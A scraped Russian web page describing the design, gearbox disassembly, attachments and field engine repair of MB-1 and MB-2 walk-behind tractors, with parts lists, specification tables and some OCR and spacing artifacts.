Рис. 28. Клиноременная передача мотоблока МБ-2: 1 — пружина; 2 — планка; 3 — кольцо В20; 4 — шайба; 5 — шкив входного вала редуктора; 6 — шпонка; 7 — болт М8-18-Ц; 8 — шайба А8: Р — шайба 8Т; 10 — гайка 8-ц; 11 — кожух шкива; 12 — щиток; 13 — болт; 14 — шайба; 15 — шкив натяжного устройства; 16 — ремень АХ-1180; 17 — шпонка; 18 — кольцо В25; 19 — шкив выходного вала двигателя; 20 — болт М8; 21 — кронштейн; 22 — втулка; 23 — кронштейн; 24 — шплинт 2×16: 25 — пружина

       Передача включается путем натяжения ремня с помощью шкива натяжного устройства. Как видно из рис. 28 и 29, принципиальным отличием между ними является использование в мотоблоках МБ-1 фактически двух клиноременных передач: одной для включения переднего хода, другой — для заднего, в то время как в мотоблоке МБ-2 включение заднего хода осуществляется с помощью редуктора, и необходимость в ремне заднего ход отпадает.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 29. Клиноременная передача Мотоблока МБ-1: 1 — шкив натяжного устройства переднего хода; 2 — кронштейн; 3 — шайба; 4 — шкив натяжного устройства заднего хода; 5 — пружина; б — шпонка; 7 — шкив выходного вала двигателя; 8 — пружина; Р — винт стопорный; 10 — кронштейн; 11 — шпонка; 12 — тяга включения переднего хода; 13 — ремень приводной переднего хода А-1210вн III; 14 — ремень приводной заднего хода 0-1400 I; 15 — шкив входного вала редуктора; 16 — тяга включения заднего хода; 17 — кожух шкива; 18 — щиток; 19 — планка; 20 — пружина; 21 — пружина; 22 — кронштейн; 23 – болт

Проверку натяжения ремня при нажатом рычаге сцепления проводят при снятом щитке 12 (рис. 28) или 18 (рис. 29) в соответствии с рис. 30.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Редуктор предназначен для передачи крутящего момента от двигателя (через клиноременную передачу) к колесам мотоблока, изменения передаточного числа (скорости движения) и изменения направления движения мотоблока (только для мотоблока МБ-2).

       Редуктор мотоблока МБ-2 в сборе приведен на рис. 32.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 32. Редуктор мотоблока МБ-2.

       Рис. 32. Редуктор мотоблока МБ-2: 1 — винт сливного отверстия; 2 — подшипник 180306; 3 — манжета; 4 — полуось правая; 5 — крышка оси. 6 — звездочка (правой полуоси); 7 — пружина; 8 — цепь (49 звеньев); 9 — винт отверстия контроля уровни масла; 10 — втулка; 11 — звездочка блок-вала; 12 — половина корпуса правая; 13 — втулка; 14 — звездочка блок-звездочки; 15 — звездочка промежуточного вала; 16 — втулка; 17 — вал промежуточный; 18 — втулка; 19 — входной вал; 20 — заглушка заливного отверстия: 21 — вал переключения; 22 — вилка переключения; 23 — подшипник 204; 24 — колесо зубчатое; 25 — манжета; 26 — втулка; 21 — колесо зубчатое; 2S — блок-звездочка; 29 — втулка; 30 — колесо зубчатое; 31 — колесо зубчатое; 32 — блок-вал; 33 — втулка; 34 — половина корпуса левая; 35 — вилка разобщения полуосей; 36 — муфта сцепления полуосей; 37 — полуось левая; 38 — манжета; 39 — подшипник 180306; 40 — прокладка; 41 — рычаг; 42 — пружина, 43 — винт; 44 — плата. Кинематическая схема редуктора.

       Детальное устройство редуктора МБ-2 показано на рис. 33 и 34.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 33. Корпус редуктора МБ-2.

       Рис. 33. Корпус редуктора МБ-2: 1 — винт; 2 — прокладка; 3 — заглушка; 4 — штифт, 5 — плата; 6 — шайба; 7 — болт М6: 8 — пружина переключателя передач; 9 — винт М6х34; 10 — гайка М6; 11 -рычаг переключения передач; 12 — ручка шаровая; 13 — болт Мб; 14 — крышка; 15 — прокладка; 16 — болт М6; 17 — тарелка; 18 — шайба пружинная; 19 — шайба А8; 20 — кольцо СТ41-29,5-4; 21 — крышка оси; 22 — прокладка; 23 — половина корпуса левая; 24 — прокладка; 25 — половина корпуса правая; 26 — шайба.

       Половины 23 и 25 (рис. 33) корпуса редуктора отлиты из алюминиевого сплава и соединяются между собой болтами через уплотнительную прокладку 24. Они имеют фланцы для крепления крышек 14 и 21 подшипников с манжетами.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 34. Редуктор МБ-2, внутреннее устройство.

       Рис. 34. Редуктор МБ-2, внутреннее устройство: 1 — блок-вал; 2 — втулка, 3 — блок-звездочка; 4 — цепь (25 звеньев); 5 — соединительное звено; 6 — шайба; 7 — втулка; 8 — звездочка; 9 — шайба; 10 — вал промежуточный; 11 — вал входной, 12 — вал переключения передач; 13, 14 — колеса зубчатые; 15 — вилка переключения передач; 16 — подшипник 204; 17 — манжета; 18 — пружина; 19 — рычаг переключения передач; 20 — кольцо уплотнительное; 21 — шайба; 22 — ось; 23 — пружина; 24 — вилка разобщения полуосей; 25 — кронштейн; 26 — винт М6х10; 27 — шайба; 28 — трос разобщения полуосей; 29 — манжета; 30 — подшипник 180306; 31 — ось тяги; 32 — полуось левая; 33 — шплинт 2×14; 34 — муфта сцепления полуосей; 35 — втулка; 36 — соединительное звено цепи; 37 — цепь (49 звеньев); 38 — полуось правая.

       Примечание. В редукторах мотоблоков раннего выпуска вместо втулок поз. 2, 7, 35 устанавливались подшипники: поз. 2 — подшипник 300, поз. 7 — подшипник 202, поз. 35 — подшипник 304 ГОСТ 833-75.

Редукторы мотоблоков МБ-1 «Нева» (выпускавшихся ранее), МБ-1Д «Ока», МБ-1 «Каскад» (кроме его отдельных модификаций) имеют одинаковую конструкцию, приведенную на рис. 35.

       Корпус редуктора стальной, штампованный, состоит из двух половин 2 и 22, скрепленных между собой через уплотнительную прокладку 3 болтами. К каждой половине корпуса приварены угольники 8 и 23, образующие несущую раму мотоблока.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 35. Редуктор мотоблоком МБ-1 (продольный разрез).

       Рис. 35. Редуктор мотоблоком МБ-1 (продольный разрез): 1 — ручка переключения; 2 — половина корпуса правая; 3 — прокладка; 4 — цепь (34 звена); 5 — пробка; 6 — палец; 7 — болт; 8 — угольник правый; 9 — блок звездочек второй; 10 — болт; 11 — палец; 12 — цепь (30 звеньев); 13 — блок звездочек третий; 14 — палец; 15 — подшипник; 16 — вал выходной; 17 — болт М6; 18 — крышка; 19 — манжета; 20 — подшипник; 21 — цепь (28 звеньев); 22 — половина корпуса, левая; 23 — угольник левый; 24 — цепь (36 звеньев); 25 — блок звездочек первый; 26 — цепь (46 звеньев); 27 — вал переключения (входной вал); 28 — манжета; 29 — подшипник; 30 — подшипник; 31 — звездочка (первой передачи); 32 — звездочка (второй передачи).

       Внутреннее устройство редуктора показано на рис. 36-40.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 36. Вал переключения.

       Рис. 36. Вал переключения: 1 — ручка переключения; 2 — кольцо уплотнительное; 3 — шплинт; 4 — звездочка; 5 — шайба: 6 — кольцо; 7 — вал переключения; 8 — сухарь переключения; 9 — втулка; 10 — пружина фиксатора; 11 — винт стопорный

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 37. Блок звездочек первый.

       Рис. 37. Блок звездочек первый: 1 — блок звездочек первый; 2 — шайба; 3 — подшипник 942/15: 4 — втулка; 5 – палец

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 38. Блок звездочек второй.

       Рис. 38. Блок звездочек второй: 1 — блок звездочек второй; 2 — втулка; 3 — подшипник 941/20; 4 — палец; 5 – шайба

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 39. Блок звездочек третий.

       Рис. 39. Блок звездочек третий: 1 — блок звездочек третий; 2 — втулка; 3 — подшипник 941/20; 4 — палец; 5 – шайба

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 40. Вал выходной.

       Рис. 40. Вал выходной: 1 — шайба; 2 — вал выходной; 3 — втулка

       Крутящий момент от входного вала 21 (рис. 35) на выходной вал 16 редуктора передается либо от левой 31, либо от правой 32 звездочки входного вала. Та или иная звездочка вводится в зацепление с входным валом с помощью сухаря 8 (рис. 36), перемещаемого вдоль оси вала ручкой 1 переключения. При утопленной ручке 1 вводится в зацепление звездочка 31, включается первая (низшая) передача. При выдвинутой до конца ручке / включается вторая (высшая) передача.

       Среднее положение ручки 1 переключения нейтральное.

       Редукторы мотоблоков МБ-1Р «Нева». МБ-1 «Каскад» моделей 6841-01, 6841-03, 6841-05 и 69412,69412-07 отличаются конструкцией установки выходного вала. В этих редукторах, выходной вал, устанавливается в место игольчатых на шариковых подшипниках. В соответствии с этим, заменены тип манжет, и конструкция закрывающих их крышек.

<< Предыдущая :: Оглавление :: Следующая >>

Как правило, при постоянном контроле, за уровнем масла в редукторе и без резких (ударных) изменений нагрузки на мотоблок редуктор служит долго и надежно. Возможные при его эксплуатации неисправности приведены в таблице.

Характер неисправности Возможная причина Метод устранения

1 Течь масла по выходному валу Износ рабочей кромки манжеты на крышке оси Снять крышку, заменить манжету

2. Не работает механизм разобщения полуосей), нарушена регулировка привода, изменить натяжение троса управления разобщением полуосей.

  б) поломка одного из элементов привода разобщения полуосей внутри редуктора

б) разобрать редуктор, заменить дефектные детали

3. Нет фиксации или самопроизвольное выключение передачи

а) нарушение регулировки в механизме переключения

а) ослабить винты крепления платы механизма переключения, включить I передачу, затянуть винты крепления платы

  б) поломка пружины или износ фиксаторов платы механизма переключения

б) заменить дефектные детали, выполнить регулировки по п. «а»

  в) износ щеки вилки переключения

в) разобрать редуктор, заменить вилку переключения

4. Нет кинематической связи внутри редуктора Обрыв сварки шестерни с блок-валом Разобрать редуктор, заменить блок-вал

5. Заклинивание редуктора Обрыв цепи. Разобрать редуктор, заменить цепь

Для разборки редуктора снимите его с мотоблока, для чего необходимо:

       — снять двигатель, рулевую колонку, тягу, шкив натяжной с кронштейном и пружиной, шкив с ведущего вала редуктора;

       — с несущей рамы снять крылья, штырь, стойку рулевого управления, вывернуть стяжные болты угольников и снять их, отсоединить колеса. Перед разборкой очистите редуктор от грязи, слейте масло.

       Снимите рычаг 41 (рис. 32) переключения передач, пружину 42 и плату 44.

       Отверните болты крепления крышек 14 и 21 (рис. 33) и выньте их вместе с манжетами.

       Отверните гайки стяжных болтов половин корпуса редуктора, положите редуктор на левую половину корпуса, с помощью тонкой отвертки или ножа аккуратно, чтобы не повредить прокладку, рас стыкуйте половины корпуса редуктора, снимите правую половину.

       Приподнимите промежуточный вал 10 (рис. 34), снимите с него звездочку 8 и выведите ее из зацепления с цепью.

       Снимите вилку 15 с валика 12 переключения вместе с шестернями 15 и 14, блок-звездочку 3 вместе с цепью.

       Снимите блок-вал / вместе с цепью 37 и полуосью правой 38.

Редуктор мотоблока МБ-1 является основой, на которой монтируются другие узлы и агрегаты мотоблока. Поэтому для проведения ремонта редуктора с разборкой необходимо разобрать мотоблок, для чего демонтировать двигатель, рулевую колонку, поддон, кронштейны со шкивами ремней переднего и заднего хода, шкив редуктора, колеса.

       Перед разборкой редуктора очистите его от грязи, слейте масло.

       Снимите вращающуюся головку с ручки переключения передач, выбив тонкой выколоткой удерживающий ее штифт.

       Выверните стопорный винт 11 (рис. 36) и снимите с вала переключения 7 втулку 9 и пружину 10 фиксатора.

       Отверните болты 17 (рис. 35), крепящие половины корпуса, затем стяжные болты 7 (2 шт.) и 10.

       Положите редуктор на левую половину корпуса, с помощью тонкой отвертки или ножа аккуратно, чтобы не повредить прокладку, рас стыкуйте половины корпуса редуктора и снимите правую половину. Постановочные шайбы стяжных болтов оставьте на блок-звездочках.

       Примечание. Рекомендуется снимать с редуктора только дефектные детали, не разбирая редуктор полностью.

       Для разборки механизма переключения передач снимите с вала переключения 7 (рис. 36) стопорное кольцо б, обеспечив свободный ход звездочек 31. 32 (рис. 35). Выньте шплинт 3 (рис. 36) из резьбовой части ручки / переключения, выверните ее (против часовой стрелки) из сухаря 8 и выньте ручку и сухарь из вала.

Несущую раму мотоблока МБ-2 образуют два угольника 5 и 21 (рис. 41). к которым крепятся редуктор, двигатель, рулевое управление и устройства для подсоединения прицепных и навесных орудий и агрегатов

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 41. Несущая рама мотоблока МБ-2.

       Рис. 41. Несущая рама мотоблока МБ-2: 1 — крыло правое; 2 — болт М6, 3 — болт М8; 4 — болт М10; 5 — угольник правый, 6 — стойка; 7 — шкворень; 8 — фиксатор; 9 — кронштейн; 10 — шайба 10Т; 11 — гайка 10; 12 — ограничитель; 13 — крыло левое; 14 — шайба А6; 15 — шайба 6; 16 — гайка 6; 17 — шайба А10; 18 -гайка 8; 19 — шайба 8Т; 20 — шайба А8; 21 — угольник левый; 22 — штырь; 23 — болт М10.

       Устройство рулевого управления мотоблока МБ-2 показано на рис. 42. Рулевая колонка 1 устанавливается на стойку 6 (рис. 41) несущей рамы.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 42. Рулевое управление мотоблока МБ-2.

       Рис. 42. Рулевое управление мотоблока МБ-2: 1 — рулевая колонка; 2 — шайба А12; 3 — болт; 4 — пробка; 5 — хомут; 6 — гайка крыльчатая; 7 — трос газа; 8 — шайба; 9 — пружина; 10 — цепь; 11 — серьга; 12 — корпус; 13 — ось; 14 — винт ВМб; 15 — рычаг управления разобщением полуосей; 16 — рычаг газа; 17 — ручка; 18 — руль; 19 — шайба А8; 20 — шплинт 2×16; 21 — шайба А6; 22 — шайба 6; 23 — гайка 6; 24 — руль; 25 — рычаг управления сцеплением; 26 — направляющая; 27 — шпилька; 28 — тяга; 29 — хомутик.

       Несущая рама мотоблока МБ-1, в отличие от мотоблока МБ-2. образуется поддоном / (рис. 43) совместно с угольниками 8 и 21 (рис. 35), приваренными к половинам корпуса редуктора МБ-1, и закрепленным на этих угольниках с помощью болтов кронштейном 7 (рис. 43).

       На отдельных моделях мотоблоков типа МБ-1 (например, МБ-IP) дуга 2 может отсутствовать.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 43. Элементы несущей рамы мотоблока МБ-1.

       Рис. 43. Элементы несущей рамы мотоблока МБ-1: 1 — поддон; 2 — дуга; 3 — болт М8х30; 4 — болтМ8х18; 5 — шайба; 6 — гайка; 7 — кронштейн; 8 — кронштейн; 9 — шкворень; 10 — фиксатор; 11 — ограничитель; 12 — болт М10х70; 13 — штырь; 14 — шайба; 15 — гайка.

       Конструкция рулевого управления мотоблоков МБ-1 представлена па рис. 44.

Данная конструкция позволяет изменять положение рулевого управления только в вертикальной плоскости, т.е. по высоте положения ручек.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

.СовместносмотоблокомВыприобрелиикомплектфрезкультиваторов, предназначенныйдлярыхленияпочвы. Этаоперация, какправило, проводитсявеснойприподготовкепочвыподпосев.

       Техническиехарактеристики

             Шириназахвата (при 8 фрезах), мм 1200

             Глубинаобработкипочвы, ммДо 250

             Производительность, га/ч 0,12

       Количествонавешиваемыхфрездолжнобытьнеменеечетырех, (дляобеспеченияустойчивостимотоблока) инеболеевосьми (длянедопущенияперегрузокдеталейредуктора). Фрезырасполагаютсясимметричноотносительнопродольнойосимотоблока, и, следовательно, ихчислодолжнобытьчетным (рис. 45).

       Восемьфрезиспользуютсяприработеналегкихпочвах, наглинистыхчетыре. Глубинуобработкирегулируйтезаглублениемограничителя 3 (рис. 1), закрепленногофиксаторомвкронштейне 4.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 45. Фреза-культиватор: 1 — культиватор, 2 — валик, 3 — удлинитель.

       Для своего участка в зависимости от качества и состава почвы опытным путем подберите наиболее удачное соотношение числа установленных фрез и глубину обработки (глубиной установки ограничителя) таким образом, чтобы мотоблок двигался равномерно со скоростью около 1 км/ч (15 м/мин). При этом на мотоблоке должна быть включена вторая передача и установлены номинальные обороты двигателя.

       Глинистые и за дерненные почвы рекомендуется культивировать за два-три прохода, постепенно увеличивая глубину обработки.

      Плуг (рис. 46) используется для вспашки земли с переворачиванием пласта, закапывания органических и минеральных удобрений.

       Как правило, эти виды работ проводят осенью при подготовке земли под посадки следующего года.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис.46 Плуг с регулятором

Технические характеристики

             Ширина захвата, мм До 180

             Глубина обработки, мм До 200

             Рабочая скорость, км/ч До 3,6

             Часовая производительность при вспашке почвы с рабочей скоростью 3 км/ч, га/ч Не менее 0,05

             Масса, кг 16

       После навески плуга на мотоблок:

       Отрегулируйте его положение так, чтобы продольная ось регулятора плуга совпала с продольной осью мотоблока.

       Следите, чтобы грядиль плуга всегда занимал вертикальное положение.

       Используйте груз массой до 20 кг, надев его на передний штырь мотоблока.

       При работе с плугом используйте удлинители полуосей, входящие в комплект мотоблока, и металлические колеса с грузами.

Окучник (рис. 47) навесной двухрядный, предназначен для нарезания борозд и междурядной обработки картофеля и других пропашных культур.

       Окучник навешивается к мотоблоку с помощью сцепки-регулятора.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 47. Окучник с регулятором.

Технические характеристики

       Максимальная база между окучниками (ширина междурядий), мм 700

       Глубина окучивания, мм 80… 150

       Раствор отвалов, мм:

             мин. 180

             макс. 470

       Рабочая скорость, км/ч Не более 3,6

       Часовая производительность при окучивании посадок шириной междурядий при рабочей скорости 3 км/ч, га/ч 0,15

       Масса, кг 18

Выкапыватель корнеплодов (рис. 48) навесной, предназначен для выкапывания клубней картофеля и других корнеплодов из почвы механизированным способом.

Технические характеристики

       Диапазон регулировки отвала, мм 270…400

       Ширина режущей кромки, мм 105

       Часовая производительность при рабочем захвате 400мм и рабочей скорости 3 км/ч, га/ч 0,1

       Масса, кг 6,4

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 48. Выкапыватель корнеплодов

При работе с выкапывателем:

       • Используйте груз массой 20 кг, навешивая его на передний штырь мотоблока для уравновешивания выкапывателя.

       • Перед началом работы срежьте и уберите ботву и траву с участка

       • При работе с выкапывателем используйте металлические колеса (грунтозацепы) в комплекте с утяжелителями (до 20 кг на каждое колесо).

       Чтобы не повредить клубни колесами, выкапывание проводите через ряд.

Металлические колеса с грунто зацепами предназначены для увеличения тягового усилия мотоблока за счет большего сцепления с почвой. С мотоблоками используются колеса двух видов. Широкие колеса (рис. 49) используют для работы с плугом, окучниками, выкапывателем и как транспортные в условиях бездорожья. Рекомендуется применять такие колеса в комплекте с грузом массой до 20 кг на каждое колесо.

       Колеса для окучивания используются для увеличения клиренса мотоблока, что позволяет производить второе и третье окучивание без повреждения растений при их высоте до 200…250 мм.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 49. Колеса металлические

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Выпускаемые для мотоблоков тележки (рис. 51) предназначены для перевозки сельскохозяйственных продуктов, инвентаря, удобрений, строительных материалов массой от 200 до 500кг. Как правило, все тележки имеют опрокидываемый кузов и изготавливаются в различных модификациях, отличающихся типами и размерами колес, размером кузова, системой тормозов

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 51. Тележка к мотоблоку Технические характеристики

Технические характеристики

Грузоподъемность, кг200250-500500

Размеры кузова, мм:     

длина113015101600

ширина94011301200

глубина250275330

Вместимость кузова, м’0,250.470,6

Угол опрокидывания, град30…60

Колея, мм100014001400

Дорожный просвет, мм280315275

       Все тележки снабжены механическим тормозом, требующем проверки перед каждым выездом и периодического технического обслуживания для обеспечения безопасной эксплуатации тележки.

Водяной насоспредназначен для перекачивания воды из открытых водоемов, емкостей, колодцев, полива участков.

       Наиболее широко с мотоблоками типа МБ применяется насос центробежный типа НЦВ-1 (рис.52).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 52. Насос НЦВ-1.

Технические характеристики

Высота всасывания воды, м6

Высота подъема воды, м35

Производительность, м3/ч8

Масса, кг6

       Насос навешивается на передний штырь мотоблока. Привод насоса осуществляется с помощью ремня от шкива выходного вала двигателя. Насос имеет в верхней части воронку для залива системы водой перед его включением.

Косилка в сборе с мотоблоком предназначена для скашивания трав на небольших и труднодоступных участках (на опушках и полянах лесов, в местах, заросших кустами, на обочинах дорог, полей, канав, на склонах, газонах и приусадебных участках), неудобных для работы других механических косилок.

       Выпускается два вида косилок: ножевая, (рис. 53) и роторная (рис. 54).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 53. Косилка ножевая

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 54. Косилка роторная

Технические характеристики

  Рис. 53Рис. 54

Тип Ножевая Роторная

МодельКН-1,1КРН-1

Ширина захвата, м1.10,8

Производительность, га/ч0,350,35

Рабочая скорость, км/ч2,5…52,5…4,5

Высота среза, мм40…7070

Масса, кг4035

Привод Клиноременной от шкива на выходном валу двигателя

       Ножевая косилка срезает траву ниже, чем роторная, но для нее необходим ровный, чистый от посторонних предметов участок с негустой высокой травой. Роторная косилка за счет использования убирающихся ножей более неприхотлива к местности и может использоваться как для стрижки газонов, так и для кошения грубо стебельной травы и травы с повышенной урожайностью растительности.

Грабли (рис. 55) в сцепе с мотоблоком предназначены для сгребания в валки сена провяленной и свежескошенной травы.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 55. Грабли прицепные ГП-2

Технические характеристики

Ширина захвата, м2

Скорость рабочая, км/чДо 12

Колесная колея, м1,2

Подъем грабельного аппарата Ручной

Масса, кг125

Кормодробилка (рис. 56) предназначена для измельчения зерна и корнеплодов. Применяется для приготовления корма при содержании домашних животных в личных хозяйствах.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис 56. Кормодробилка

Технические характеристики

Производительность, кг/ч 

свекла600

пшеница300

Толщина стружки измельчения корнеплодов, мм2…4

Модуль помола, мм, не более1,8

Масса, кг38

Приставка деревообрабатывающая:

Предназначена,  для обработки пиломатериалов при строительстве и ремонте сельских и дачных домов, подсобных помещений в местах, где нет электроснабжения. Имеет фуганок и циркулярную пилу для продольной и поперечной разрезки древесины (рис. 57).

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 57. Приставка деревообрабатывающая ПД-401

Технические характеристики

Частота вращения, об./мин3000

Диаметр циркулярной пилы, мм400

Толщина разрезаемого материала, мм130

Ширина строгания, мм200

Масса, кг60

Смесеприготовитель(рис. 58) предназначен для приготовления раствора или бетона. Привод — от мотоблока через клиновой ремень от выходного вала редуктора.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 58. Смесеприготовитель

Технические характеристики

Емкость, л35

Частота вращения, об./мин25

время перемешивания, мин2

Габаритные размеры1000x800x700

Снегоуборщик (рис. 59) шнекового типа предназначен для уборки снега с приусадебных дворов и пешеходных дорожек.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Рис. 59. Снегоуборщик Технические характеристики

Технические характеристики

Номинальная ширина захвата, мм700

Глубина обработки, мм250

Выброс снежной массы в сторону, м8

Производительность при свежевыпавшем снежном покрове до 20 см, м2/ч2500

Масса, кг55

Габаритные размеры, мм790x730x780

РаботасМотоблоком:

Ремонт двигателя мотоблока луч.

(В полевых условиях.)

Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Мотор мотоблока плохо работает или заклинил. Необходимо заглянуть внутрь. Чтобы открыть крышкублока цилиндра, необходимо слить масло с картера двигателя,  разобрать все механизмы клиноременной передачи мотоблока. И в аккуратной последовательности сложить их в отдельное место так, чтобы потом можно было собрать.Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Откручивая крышку блока цилиндра, может возникнуть проблема с откручиванием крепёжных болтов.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Болты очень близко к площадке, на которой устанавливается двигатель. Если, в полевых условиях у вас нет торцового ключа, вам нужно ослаблять или открутить крепёжные болты двигателя.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород

В полевых условиях, с ограниченным количеством инструментов и запасных частей, открывая крышку блока цилиндра, очень важно не повредить прокладку картера и сальник подшипника. Как правило, эта уплотнительная прокладка пригорает и залипает, а старый сальник начинает течь после разборки.

Открыв крышку картера, Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Регулировка центробежного регулятора на мотоблоке - Сад и Огород  

увидим причину неисправности.

Аккуратно вынимаем распределительный вал, не повредив толкатели клапанов и кулачки на распред. валу, шестерни центробежного регулятора.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Всё промываем, прочищаем. Если есть возможность заменить старую прокладку крышки картера и сальник, нужно обязательно зачистить место для новой прокладки или сальника, и заменить. Но в полевых условиях, в дали, от основной вашей ремонтной базы, трудно произвести ремонт. Если вы решили всё поставить старое, то наоборот нужно зачищать или не зачищать там, чтобы прокладка, крышки картера плотно прилегала и не зачищать там, где может быть возможная утечка масла, из-за появления трещины, скола высохшей прокладки. И на валу не зачищать ободок заграфиченого масла, высохшего сальника. Это всё временные меры. Потом сальник потечёт, и из прокладки будет течь масло. Значит, двигатель опять умрёт.

Причина установлена, нужно снять головку цилиндра, корпус вентилятора при необходимости бензобак. Аккуратно, не испортив прокладку головки цилиндра.

Нужно проверить цилиндр и коленчатый вал, чтобы трущая часть была гладкая без  царапин.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород

При капитальном ремонте необходимо продуть каналы подвода масла на кален валу.

Нужно заменить шатун. На новом шатуне могут быть зазубринки, заусенцы,  которые мешают устанавливать шатун на колен вал. Их необходимо убрать.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород  
И подогнать так шатун, чтобы он плотно крепился на каленвалу.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород

При установке в двигатель, стыки поршневых  компрессионных и маслосъёмных колец  не должны быть в одном месте, они должны стыковаться в разных местах на поршне, что увеличивает компрессию двигателя.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Очень важно зафиксировать болты, со специальными шайбами подогнув на них усики не дающие раскручиваться крепёжным болтам, во время работы двигателя.  После установки на место необходимо проверить верхнюю часть, если усики спец шайба задевают за корпус двигателя, шатун будет стучать и, в конце концов, сломается.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород  

Для этого нужно покрутить в ручную и посмотреть, как будет крутиться каленвал. Сборка, всё в обратной последовательности. Выколотить или вытащить старый сальник из крышки картера, прочистив место для нового, аккуратно на это место вставляем новый сальник, равномерно, лёгким постукиванием заколачиваем на своё место, стараясь не повредить сам сальник, и не испортить круглое, пружинистое колечко.  Прокладку крышки картера навешиваем на направляющие штырьки и лучше всего прилепить её, например на масло, чтобы она не сместилась во время установки крышки картера.

Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород

Крышка должна попасть в колен вал и распределительный вал, и направляющие штырьки. При установке крышки картера, нужно немного покрутить кален вал, чтобы все шестерёнки совпали. Потом болты утягиваем крест накрест, чтобы крышка с прокладкой равномерно прижималась к блоку.

Ремонтируя двигатель, вы захотите притереть клапана.  Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Вроде не чего особенного, снял пружины и крути со специальной пастой или пастой Гоя. Но как только начинаешь приспосабливаться, так сразу понимаешь, что место мало, дрель не куда не затолкаешь, вручную притирать клапан в седле уйдёт пол дня.  Для проверки наливают немного бензина на закрытые клапана, если бензин не утекает, а стоит лужицей, то клапан притёрли хорошо. С хорошей компрессией движка, мотоблок заводиться хорошо и бегает быстро. Чтобы установить клапана на место нужно стянуть пружину. Я стягиваю её прочными лямками, с двух сторон. Далее, на выпускном клапане собираю сухарики на месте, обрезаю лямки, и пружина прижимает сухарики. На впускном клапане также собираешь, вместо сухариков, тарелку впускного клапана. Обрезаешь и вытаскиваешь стяжные лямки, пружина прижимает клапан, упираясь в тарелку.
Регулировка центробежного регулятора на мотоблоке - Сад и Огород  Регулировка центробежного регулятора на мотоблоке - Сад и Огород
Регулировка центробежного регулятора на мотоблоке - Сад и Огород  

Source: www.sites.google.com

Оцените статью
Про мотоблоки
Добавить комментарий

Adblock
detector